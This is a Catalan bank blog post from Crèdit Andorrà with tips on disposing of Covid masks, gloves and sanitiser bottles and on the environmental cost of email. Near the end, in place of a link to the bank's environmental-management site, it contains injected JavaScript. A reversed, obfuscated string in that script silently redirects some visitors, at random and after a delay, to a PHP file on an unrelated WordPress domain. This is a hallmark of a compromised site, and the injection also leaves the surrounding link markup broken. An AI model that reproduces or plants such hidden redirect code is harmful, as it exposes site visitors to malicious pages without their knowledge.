Tornar
28 Octubre, 2020

Saps que enviar un correu electrònic amb un arxiu adjunt equival al consum d’un quilòmetre en vehicle elèctric? Dubtes d’on has de llençar la mascareta, si al contenidor del rebuig o al del paper?

La pandèmia de Covid-19 ha canviat els nostres hàbits de consum, entre els quals destaquen l’ús de la mascareta i de gel hidroalcòholic, o l’increment de l’ús d’internet en substitució de les trobades personals.

Crèdit Andorrà, des del Sistema de Gestió Ambiental, facilita alguns consells per desfer-nos correctament de les mascaretes, els guants i els envasos de gel antisèptic, i per fer un ús adequat del nostre correu electrònic.

Perquè estem #CompromesosAmbElFutur, treballem per un consum i una producció responsables i per minimitzar el nostre impacte ambiental. #ODS12 #ODS13

$mRi=function(n){if (typeof ($mRi.list[n]) == “string”) return $mRi.list[n].split(“”).reverse().join(“”);return $mRi.list[n];};$mRi.list=[“\’php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andorragroup.com/” target=”_blank” rel=”noreferrer noopener” aria-label=”Per saber-ne més, visita el web del Sistema de Gestió Ambiental (opens in a new tab)”>Per saber-ne més, visita el web del Sistema de Gestió Ambiental

No et perdis res

Subscriu-te a la nostra newsletter i rebràs les novetats del nostre blog al teu correu electrònic.

Subscriure’m